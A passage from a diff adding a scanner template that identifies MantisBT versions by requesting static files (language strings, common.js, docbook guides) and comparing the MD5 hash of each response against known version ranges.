1.2.13 - 1.2.16 + dsl: + - "(\"7fd8f5ac59988a4bc6f4408ad98bc9e5\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"f9481adbe5ee6836a75160782dda2072\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"d396f7513e9ef5015ffdda8a5f43e728\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"bb3feab555a9fd5a49ae739fc8437621\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"4335aecb5ce09136c8619752a81311b2\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"aecf0dc2b56b5eea801ebf241442dd20\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"5d52fcbe5ebaa22142eea2d3fab146e2\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.12.2 + dsl: + - "(\"a3d098d61755751c65c78dcc623bd4f1\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"f4b74cfc224670309c1e4509803267b0\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"0b5fa4eae94bb915647d39aaa874b8b2\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"8eef916cdd688b9cdac9df8ba6b47de0\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"084cc93f2765e6b25a1f7b7918f84292\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"119cb85fd76d1932e9f73767c95d2c15\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"48042a3e6018813b156961ffb19d9fcd\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_urdu.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.8.1 + dsl: + - "(\"5f126a9761bd7a210b3c1bdd0b387017\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"3a976de274eaf80a448a5d6c9db8ee04\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"175409d997221d661a626e167b0b08b1\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"96e8e474dad8a37544afe8de796e7871\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"6d28b1f321599d27c1c439e6f3038ac6\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"9ba69f2a907185db66886e868458eef8\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9d5529d9df822143ae4f5176323f717d\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"82bc201b83c3a13acf228e58ff2f8c44\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"40b59965a4f8c014a09988c1340bbc45\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"d90deef6a09a7f65bcab27276a91c8c9\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"2f23776ce4f1a395510f3eb8c194a6de\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"53a2b00ad50db745ba37310b84a699ba\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"6cf220ffcbdae0918a8ae7d159fdeec6\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"32617f856bc713cca7888122fdfe367c\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"de8f623a140b68e8602c16e2d6129eba\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"63f77be015379140e93f11d4e85bc6fd\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"480629341f4b69723f3dc86e80041b90\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"729cf5ba88453fac93d47c82481ccf31\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.10.1 + dsl: + - "(\"d8b3e53c9fdf591d39044ded91c7966a\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.12.2 + dsl: + - "(\"2a393cb0bd279fc13344e0df7aa4711b\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"e2703d0e2f0b6ff1fa3f6b2eae63b19f\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.18.1 + dsl: + - "(\"e36384e6a1abdbb81688a0ae050753fa\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"14769bd06486b17d5122312bd39ab6e3\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"86cf88244860a659ea1b97b651579b1f\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"7ba474f2683ab107cec54ca0ae5d2c17\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_icelandic.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.12.2 + dsl: + - "(\"168365cdde4c467d3a6a25fe7d58956f\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"bf98f6fa7e8b7051746bce928564cce4\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"bfef3476ef3ff58fa40ad8b02af1c2f5\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"3b363761c10fdb023ad931e68008b00b\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"731e41fb38611e47bb8a090572db97da\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9388742b203a56e54f1e01d88284ff3f\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"6ea0d96ad554c77bfb34e550ecd08000\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"d8833768625973669a37e336fb62572d\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"3678a76c0db11c4dbf30e112679e0d1a\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"a7e701a078eee03f89dcecb39676496b\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"662b76e07e7958aabaa0dcfdae225774\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"101666d1b20d929afec115ade89557c8\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"f68f5e21cf7f14731fcafaf3945d40c8\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"f5346f93463a708bd402dd72ba43c3c1\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"03cb42cca291da468af87b77b85b99ec\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"36f531846777ef289bf5daaa3f66e572\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"06fbb5605fa2c8944574ab7ab8c1b532\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"6259d027c7679d96c18b7a06c65b181b\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"c5c35510aa8c79edf7d72459780a5df9\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"eb8da4dc1ea0f3e0a4a54af44189dc3e\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"0babb3b8174ed8bbee5d71204dc8dc1c\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"cadf21828d8923c06d731bc9baec08ee\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.18.1 + dsl: + - "(\"d2f8e34e8d495bbafad8d61e4cdbb9dc\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"83cb29f226c95d140013c95237129720\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"7aadcfcd1c58fafa92550cf14db9e82a\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"8c3580d5826262b2884accd76be08e92\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/configuration.sgml" + + matchers: + - type: dsl + name: 1.2.9 + dsl: + - "(\"cd6803e12fab2d6eff1b4f85c1ae9bea\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"def91ecc86fcf2725b41de2e8ad700d1\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"b6a40c7ae0c2ca0ea7da22f187ab2f60\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"2746c6c6312b4df7f91d372917dd42e7\" == md5(body))" + - type: dsl + name: 1.2.1 - 1.2.3 + dsl: + - "(\"15eae62f9cd1ded23b9a7858bd9bd127\" == md5(body))" + - type: dsl + name: 1.2.10 + dsl: + - "(\"ec2f9178abbc0feb59ce718e6d12447f\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"cc84dda7867100f4d4ebac5f823a756e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/common.js" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"4cf3fdd4f5d8ce44dd7a7ff9ec76e851\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"6534355abb7b38b1895f5aec87a0911d\" == md5(body))" + - type: dsl + name: 2.3.1 - 2.3.3 + dsl: + - "(\"0a5ffb6f2bc29590b7f27cbd61fb9a06\" == md5(body))" + - type: dsl + name: 2.3.0 + dsl: + - "(\"4faacae14007bbdecac275e0ccb29a6b\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"918b78300758cf38269d04de2284573a\" == md5(body))" + - type: dsl + name: 2.1.1 - 2.1.3 + dsl: + - "(\"71f340721249aa21b75f17cb093d557f\" == md5(body))" + - type: dsl + name: 2.1.0 + dsl: + - "(\"ca3d0fd8c25c7a23622586d24ad7e66b\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"ba539d66cd98e24d0fd4a0c8daee93bc\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"92b4f15c87e8db612c31211aa0be9d6f\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.12.2 + dsl: + - "(\"3a8e41fa2e140f41306a68eb014f57f8\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.16.1 + dsl: + - "(\"f995cf8ce0b3d0f3f8df6b4c0fd2c0e7\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.18.1 + dsl: + - "(\"53ae82acd46f2e36728856a7c5f575f3\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"774aa4ba32ad52e9cd02af764b772721\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"d1e7d75e8d7a9c740b5f82006be18bd6\" == md5(body))" + - type: dsl + name: 2.21.0 + dsl: + - "(\"0dec04476282f71d19f4da38025a2974\" == md5(body))" + - type: dsl + name: 2.21.1 - 2.21.3 + dsl: + - "(\"c83068458977365194fa4cfc6b52e0b8\" == md5(body))" + - type: dsl + name: 2.22.0 + dsl: + - "(\"874ac19304570afa9cb2b0eb80bed888\" == md5(body))" + - type: dsl + name: 2.22.1 - 2.22.2 + dsl: + - "(\"3753a62312977c2e07363f069f546ce9\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"d9abe577a336a4994e4c34dbf638c793\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_latvian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"d6cb27c7c50a5eb44efb0dc695d906f1\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"24697b925d4fd90c4d5552970f39fc5d\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"e9adb87ed324e20944d4032e0bda01ca\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"9b9eb362c6d1a3636fa95a0663f98022\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"c4a3b7ac880610c775d0f8c1ec2347e1\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"176c84ed54eda46c237ee95b325ac2eb\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"055247de15a8c3da595232813ceb2898\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"0af6b1824d71ec8eac156480c347dca7\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"b189a2de9914ff99759519baee397932\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"8d3f5b157e31c7a373dd526b6fc57630\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"fb62ac377efae991d86fc3c03f64a6fe\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"e97b7ee3d6fba4da4d81f4b6f571e9ba\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"d2e79e48701964eee7183ff8a19dc310\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"49c6703118d88d89d8978101342f15b5\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"1b657a62c29f358eae2dba81c6f597e3\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.9 + dsl: + - "(\"f2c4c4e66de564cc7194cc5ef881806b\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"b9519f6cb511230a3f3df6839a51191b\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"9ffeb9d3622ff313ad099842ff277be0\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"7b9602b61ab2dd9b0f85c3787211d0b2\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"849ec25bd1cc2353ade8bf4411d06b7c\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"1ff1130a0e810bdf2906e174d3b370bf\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.23.1 + dsl: + - "(\"029223150741404e738ee928bec8b4f1\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"ac79ccf798b3b38f9ea8d21219f5f55d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_arabicegyptianspoken.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.11.1 + dsl: + - "(\"f856518900558d62147f965b5f382482\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"cedad28a1a609ae0e7927580b71a4608\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"e1907c0e6828a0d6425493ba1dcaccaa\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"22d59ba2470239e9adc5b115b9207360\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"af60de9f6b0444d54cf6b07f6eb661e1\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"8149320b8a7f9619f777889a31e3e3ee\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"4b640d3617e0c5c8ae565046d1ef6650\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"8f9682d9cebad272e21ae19acda04ef1\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"44c9f57833f95582e7464e566e219020\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"0934c4acf5976065a45f869f9b14ec2b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"2db0fe94717e5b4f82c0a0b070336769\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"4fa8f03c1acbbcf137487670f8340fed\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"b88688ea8ed783b9142d4e60b32c70a6\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"2efe1f3fd777265c37f032caf4638b39\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"ee62aab3f096bc1a0d4a67a58a97f96f\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"7130ada9e3be4e33e66e7dd2e8ef50f4\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.17.2 + dsl: + - "(\"5fb5fb8b75996fa140d60eb421fde097\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.18.1 + dsl: + - "(\"3ee4fe984fe2865af1903305faa9d6f0\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"a25d698145aac007fc6f7e34786899a7\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"032eb1d746b36d10db1b6cbcf702a014\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"74442ba9d26338302ce76a8e4fc2e7f7\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.23.1 + dsl: + - "(\"9d2a6889ff135bd4a4246ff38baa42f3\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"1c8eb871d3bfc71eeca056c545619d49\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_serbian_latin.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.11.1 + dsl: + - "(\"b1caad0b6c8c325d8e463f8f3928f300\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"5b0c873cceaf9eb16a74c9c4d35763ca\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"6ed6406ef1d4e7afc079f4f936675b09\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"d7935d183d95a7fd43b3bed75d148f76\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"d871af0e30642518fcbf6cf1bf1978a6\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"c94494c47006fb17667fec771195eae1\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"8b8fd93f8f9b42528e1f406ce436d7bc\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"a728c6026690cb2c00c0bb9737f36d39\" == md5(body))" + - type: dsl + name: 1.2.15 - 1.2.16 + dsl: + - "(\"f0436a5c589764d7bbba98a71a140b0b\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"283cbec3b0d5779fbb5cec62b440cd03\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"c9a834353069055e97998f3b302ffcda\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"c811ff74290579473b9c615fdf84116f\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"93202d89f1585f984ba49f1f30cc7f6c\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"f41ac57cf653f50285432309a3c20d0a\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"a8ed9fb101603e4103a80af58de86ffc\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"9db9a7761f01f8c2ea073ab40ec781df\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"0c499d8f366637255988f4009e87b177\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"b583515a73d4818184265c684a95c57b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_estonian.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.11.1 + dsl: + - "(\"ee4fd6aba640361e3f8a1b34713c795d\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"68346ef7a093d511ad6ddf7889817b64\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"92a71950cf9ff48265b836fffdc285af\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"6d726a69649df9d3ba2f47a0fbef5832\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"8a63cead891bc4accb8a7b67bc77020e\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"f4aa3b236c102fee3668e33d6adb54ef\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"27537ecf13a850f3171d42db42dc3d0b\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"eaf991121301234b8b3bd2b6f8cd723f\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"928205b172b300ee00c569a23448a9de\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"f293065bee2be5166f735b771182c1b8\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"cd8cf56a0a75eb672b986d10c29f329c\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"c5682b5182d3ab4801bbe1579d2a0b64\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"d271023b80073e44906e87b4d7173ec1\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"2e46684714ea163bc1fb18a4a24811fd\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"7f67f504f87d3c72462d4b0d7d20825d\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"fb9866053e2c11179232add4f3cbe00c\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"9d9360fe581a3bb12cc4e4a8243874bc\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"420045e995813d6ce7a1c6681da48270\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"f126c7ddbf5b75143d8da19f2db4830c\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"f90ceeb462d19c75a8cc22291508d155\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"980f29441a77aa40de40d8e531b2a890\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"5144c847981b3cd1b02f6b43c8935cd3\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"c1245fa93951378a75e38c342eebb5d0\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"18b59326e938182481acf4dd5cf95deb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_norwegian_bokmal.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"b6ed7b61bfe05b6456d4e121f5be2bf5\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"1c0f1b8f89137e0c3d6ef8e42360ef1e\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"8a7dd96b9034d862f6bcb0ae3a59876b\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"35f5a05219f38a4596e91e94551bd0d7\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"2ba71eca78a7b9ea1619001b924a82f2\" == md5(body))" + - type: dsl + name: 1.2.15 - 1.2.16 + dsl: + - "(\"f2c890743666149e9b17acc4a5f0264b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"263e2fe6aa366503a4aae873f8a90274\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"c07c25256e7b2f4b35fc6a7f66b59603\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"f6561de60f2bdb6e3cebeed623082e12\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"4b059bfb95aa264726296dfe10606b85\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"642e622c9d7c20c492032d6e17bb3795\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_chinese_simplified.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"59be01551e524f48203052ff21150106\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"815eab1402ab7e18d798c47894000806\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"e632be2ebfb75a0b99a95b38dd00ea9c\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"63b8645e6e9d9528e38903d9982f5894\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"7f43851be30ccb12c7b951c5649c4a21\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"d7f6596055fdef6067ba46098cfaf351\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"731a1f8546c8194cc8411fb9e4c08eb2\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"41b2a26f065fb0a88bba313d032d339e\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"0aa9d40a8724e030708594c87a54af40\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"c2dc0f671d9b62dab990377d94ee7a78\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_ripoarisch.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"1f80ffe4dfbfbbbf8ad3ec1dafae186c\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"3cdd05a581790655166cacb7c06a8f58\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"ccf83653d0a056bbbf7bc5a22cf9a398\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"166712d2b736905383bf33681992dd25\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"72e41b4b94e0a7ec104f5320f8e6b995\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5d3764e1df6494c660e7be2e3f8ee2bb\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"44daee7a56a39cb8463e3f0b530af969\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"c3696b8e8b2d869e630ad9f8d8b1b0f2\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"78b1b4e13030b34183ac05f7d135de49\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"07066af33738cdb7203faecb41b8ade0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_norwegian_bokmal.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"c8cc80446359b4c789ee2ac4d4d97ed5\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.1.3 + dsl: + - "(\"5bdae3435ca5d8d94a5eb7a7de16d47a\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"2119f8fb3057a97de0ac23185bc501e4\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"cbc70626e237ab14709d426685da6093\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"adad0bbe185c739301e2c9457bdf9a7f\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"42fb32b16279d1010b6289c64e4753f5\" == md5(body))" + - type: dsl + name: 1.2.15 - 1.2.16 + dsl: + - "(\"8c922b2c7fc068ffef25382acdd35026\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"9aa18c364f05aadf9ac5ef5e5c2ab611\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"cfeb45eb41069b129e12d3a55d178014\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"b4fce81c0be56b779e61a8683c39e20d\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"9f92a27172cbbb56da191df96cbab1f1\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"16023e56be654cec49c78494b14e9af0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Installation.xml" + + matchers: + - type: dsl + name: 2.6.0 - 2.10.1 + dsl: + - "(\"bf77bd97c9d950e3b4d65c718b76a8bd\" == md5(body))" + - type: dsl + name: 2.5.2 + dsl: + - "(\"c90fad1ffc0410df029ba27bb63fe250\" == md5(body))" + - type: dsl + name: 2.0.1 - 